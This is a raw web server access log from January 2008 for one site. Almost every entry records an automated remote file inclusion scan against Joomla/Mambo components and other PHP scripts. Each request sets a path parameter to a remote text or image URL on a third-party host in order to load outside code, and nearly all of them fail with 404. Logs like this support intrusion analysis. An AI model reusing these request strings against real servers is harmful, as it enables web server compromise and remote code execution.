87.118.114.21 - - [12/Jan/2008:11:43:40 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
87.118.114.21 - - [12/Jan/2008:11:43:44 -0800] "GET /logs/access_070812.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
87.118.114.21 - - [12/Jan/2008:11:43:46 -0800] "GET /logs/access_070712.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 329 "-" "libwww-perl/5.79" "www.projectpr.com"
87.118.114.21 - - [12/Jan/2008:11:45:18 -0800] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
66.225.246.160 - - [12/Jan/2008:11:51:00 -0800] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.225.246.160 - - [12/Jan/2008:11:51:00 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.225.246.160 - - [12/Jan/2008:11:51:00 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.52.170.162 - - [12/Jan/2008:11:53:40 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.52.170.162 - - [12/Jan/2008:11:53:40 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.36.227.10 - - [12/Jan/2008:11:56:56 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
72.36.227.10 - - [12/Jan/2008:11:57:00 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
72.36.227.10 - - [12/Jan/2008:11:57:04 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
85.119.157.176 - - [12/Jan/2008:11:57:53 -0800] "GET /logs/access.log//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
85.119.157.176 - - [12/Jan/2008:11:57:54 -0800] "GET //components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
85.119.157.176 - - [12/Jan/2008:11:57:54 -0800] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
58.145.192.10 - - [12/Jan/2008:12:05:25 -0800] "GET ///skin/zero_vote/error.php?dir=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
195.62.20.5 - - [12/Jan/2008:12:08:08 -0800] "GET /logs/access_%3Cwbr%20/%3E071112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.20.5 - - [12/Jan/2008:12:08:09 -0800] "GET /logs/access_%3Cwbr%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
65.98.61.34 - - [12/Jan/2008:12:10:26 -0800] "GET /logs/access_%3Cwbr%20/%3E071012.log///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://charitygrants.org/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
65.98.61.34 - - [12/Jan/2008:12:10:27 -0800] "GET ///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://charitygrants.org/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
65.98.61.34 - - [12/Jan/2008:12:10:27 -0800] "GET /logs/access_%3Cwbr%20///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://charitygrants.org/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
213.189.224.45 - - [12/Jan/2008:12:11:31 -0800] "GET /logs/access.log//login.php?dir=http://www.gruppomulti.ch/documents/coges.txt? HTTP/1.1" 404 272 "-" "libwww-perl/5.808" "www.projectpr.com"
213.189.224.45 - - [12/Jan/2008:12:11:33 -0800] "GET //login.php?dir=http://www.gruppomulti.ch/documents/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
213.189.224.45 - - [12/Jan/2008:12:11:34 -0800] "GET /logs//login.php?dir=http://www.gruppomulti.ch/documents/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
65.74.150.192 - - [12/Jan/2008:12:17:26 -0800] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 305 "-" "libwww-perl/5.79" "www.projectpr.com"
65.74.150.192 - - [12/Jan/2008:12:17:26 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
65.74.150.192 - - [12/Jan/2008:12:17:26 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
87.106.46.84 - - [12/Jan/2008:12:17:46 -0800] "GET /classifieds/config.inc.php?path_escape=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
87.106.46.84 - - [12/Jan/2008:12:17:47 -0800] "GET /logs/classifieds/config.inc.php?path_escape=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
213.189.224.45 - - [12/Jan/2008:12:18:27 -0800] "GET //login.php?dir=http://www.gruppomulti.ch/documents/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
213.189.224.45 - - [12/Jan/2008:12:18:27 -0800] "GET /logs//login.php?dir=http://www.gruppomulti.ch/documents/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.52.170.162 - - [12/Jan/2008:12:20:46 -0800] "GET /logs/access_071112.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.6.8.120 - - [12/Jan/2008:12:21:36 -0800] "GET /aboutus.html HTTP/1.0" 200 13748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
89.149.208.203 - - [12/Jan/2008:12:23:26 -0800] "GET /logs/access.log/classifieds/config.inc.php?path_escape=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
89.149.208.203 - - [12/Jan/2008:12:23:26 -0800] "GET /classifieds/config.inc.php?path_escape=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 272 "-" "libwww-perl/5.79" "www.projectpr.com"
89.149.208.203 - - [12/Jan/2008:12:23:26 -0800] "GET /logs/classifieds/config.inc.php?path_escape=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
85.92.73.80 - - [12/Jan/2008:12:23:56 -0800] "GET //components/com_phpshop/standalone/stubjambo.php?baseDir=http://autismsocietysa.org/Owl/Documents/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
62.193.240.89 - - [12/Jan/2008:12:24:38 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.slk.co.th/images/erick.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
85.249.135.2 - - [12/Jan/2008:12:25:38 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://kjbaudry.com/KJBiProject/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
70.84.14.132 - - [12/Jan/2008:12:26:13 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
70.84.14.132 - - [12/Jan/2008:12:26:13 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.65" "www.projectpr.com"
70.84.14.132 - - [12/Jan/2008:12:26:13 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
146.83.144.170 - - [12/Jan/2008:12:28:42 -0800] "GET /logs/access_070912.log//login.php?dir=http://www.fuori-corso.net/administration/safe.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.805" "www.projectpr.com"
146.83.144.170 - - [12/Jan/2008:12:28:43 -0800] "GET //login.php?dir=http://www.fuori-corso.net/administration/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
146.83.144.170 - - [12/Jan/2008:12:28:49 -0800] "GET /logs//login.php?dir=http://www.fuori-corso.net/administration/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
58.145.192.10 - - [12/Jan/2008:12:29:24 -0800] "GET /logs/access.log///skin/zero_vote/error.php?dir=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
58.145.192.10 - - [12/Jan/2008:12:29:25 -0800] "GET /logs///skin/zero_vote/error.php?dir=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.808" "www.projectpr.com"
199.237.204.148 - - [12/Jan/2008:12:32:58 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://epics.ecn.purdue.edu/lsc/setup_pages.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
74.52.170.162 - - [12/Jan/2008:12:33:03 -0800] "GET /logs/access.log/classifieds/config.inc.php?path_escape=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 288 "-" "libwww-perl/5.808" "www.projectpr.com"
74.52.170.162 - - [12/Jan/2008:12:33:03 -0800] "GET /classifieds/config.inc.php?path_escape=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.52.170.162 - - [12/Jan/2008:12:33:04 -0800] "GET /logs/classifieds/config.inc.php?path_escape=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
216.14.84.240 - - [12/Jan/2008:12:33:51 -0800] "GET //skin/zero_vote/error.php?dir=http://slcdelivery.com/banners/frame.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
213.195.65.245 - - [12/Jan/2008:12:34:17 -0800] "GET //skin/zero_vote/error.php?dir=http://slcdelivery.com/banners/frame.jpg? HTTP/1.1" 404 271 "-" "libwww-perl/5.805" "www.projectpr.com"
85.249.135.2 - - [12/Jan/2008:12:36:00 -0800] "GET /logs/access_070812.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://kjbaudry.com/KJBiProject/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.249.135.2 - - [12/Jan/2008:12:36:01 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://kjbaudry.com/KJBiProject/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
199.237.204.148 - - [12/Jan/2008:12:36:08 -0800] "GET //?mosConfig_live_site=http://epics.ecn.purdue.edu/lsc/setup_pages.txt??? HTTP/1.0" 200 9521 "-" "libwww-perl/5.53" "www.projectpr.com"
67.192.48.155 - - [12/Jan/2008:12:37:39 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
67.192.48.155 - - [12/Jan/2008:12:37:39 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
85.92.73.80 - - [12/Jan/2008:12:38:13 -0800] "GET /logs/access_070812.log//components/com_phpshop/standalone/stubjambo.php?baseDir=http://autismsocietysa.org/Owl/Documents/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.92.73.80 - - [12/Jan/2008:12:38:14 -0800] "GET /logs//components/com_phpshop/standalone/stubjambo.php?baseDir=http://autismsocietysa.org/Owl/Documents/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
193.142.215.14 - - [12/Jan/2008:12:38:22 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
193.142.215.14 - - [12/Jan/2008:12:38:22 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
89.212.80.130 - - [12/Jan/2008:12:38:58 -0800] "GET /logs/access_%3Cwbr%20/%3E071112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://catzu.altervista.org/80.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.212.80.130 - - [12/Jan/2008:12:38:59 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://catzu.altervista.org/80.txt? HTTP/1.1" 404 285 "-" "libwww-perl/5.805" "www.projectpr.com"
89.212.80.130 - - [12/Jan/2008:12:38:59 -0800] "GET /logs/access_%3Cwbr%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://catzu.altervista.org/80.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
69.89.25.162 - - [12/Jan/2008:12:39:09 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.89.25.162 - - [12/Jan/2008:12:39:16 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
89.212.80.130 - - [12/Jan/2008:12:39:20 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://catzu.altervista.org/80.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.212.80.130 - - [12/Jan/2008:12:39:21 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://catzu.altervista.org/80.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.212.80.130 - - [12/Jan/2008:12:39:21 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://catzu.altervista.org/80.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.18.164.29 - - [12/Jan/2008:12:39:32 -0800] "GET /logs/access_%3Cwbr%20/%3E071112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [12/Jan/2008:12:39:33 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [12/Jan/2008:12:39:33 -0800] "GET /logs/access_%3Cwbr%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [12/Jan/2008:12:39:33 -0800] "GET /logs/access_%3Cwbr%20/%3E071112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
208.186.169.183 - - [12/Jan/2008:12:39:33 -0800] "GET /logs/access.log/classifieds/config.inc.php?path_escape=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 288 "-" "libwww-perl/5.65" "www.projectpr.com"
208.186.169.183 - - [12/Jan/2008:12:39:33 -0800] "GET /classifieds/config.inc.php?path_escape=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
208.186.169.183 - - [12/Jan/2008:12:39:33 -0800] "GET /logs/classifieds/config.inc.php?path_escape=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
81.18.164.29 - - [12/Jan/2008:12:39:33 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [12/Jan/2008:12:39:34 -0800] "GET /logs/access_%3Cwbr%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
69.89.25.162 - - [12/Jan/2008:12:39:34 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 301 "-" "libwww-perl/5.808" "www.projectpr.com"
69.89.25.162 - - [12/Jan/2008:12:39:34 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.89.25.162 - - [12/Jan/2008:12:39:34 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.89.25.162 - - [12/Jan/2008:12:39:34 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.89.25.162 - - [12/Jan/2008:12:39:35 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.89.25.162 - - [12/Jan/2008:12:39:35 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
80.86.81.245 - - [12/Jan/2008:12:39:36 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.86.81.245 - - [12/Jan/2008:12:39:37 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.805" "www.projectpr.com"
80.86.81.245 - - [12/Jan/2008:12:39:37 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.86.81.245 - - [12/Jan/2008:12:39:52 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.86.81.245 - - [12/Jan/2008:12:40:03 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.86.81.245 - - [12/Jan/2008:12:40:03 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.86.81.245 - - [12/Jan/2008:12:40:04 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.214.42.97 - - [12/Jan/2008:12:40:11 -0800] "GET /logs/access_071112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.169.157.91 - - [12/Jan/2008:12:40:41 -0800] "GET /logs/access_070812.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
81.169.157.91 - - [12/Jan/2008:12:40:41 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 294 "-" "libwww-perl/5.69" "www.projectpr.com"
81.169.157.91 - - [12/Jan/2008:12:40:42 -0800] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
69.89.25.162 - - [12/Jan/2008:12:40:50 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.89.25.162 - - [12/Jan/2008:12:40:50 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.808" "www.projectpr.com"
69.89.25.162 - - [12/Jan/2008:12:40:50 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.89.25.162 - - [12/Jan/2008:12:40:51 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.89.25.162 - - [12/Jan/2008:12:40:51 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.89.25.162 - - [12/Jan/2008:12:40:51 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
217.160.191.59 - - [12/Jan/2008:12:41:16 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.160.191.59 - - [12/Jan/2008:12:41:16 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.160.191.59 - - [12/Jan/2008:12:41:16 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.160.191.59 - - [12/Jan/2008:12:41:17 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 290 "-" "libwww-perl/5.76" "www.projectpr.com"
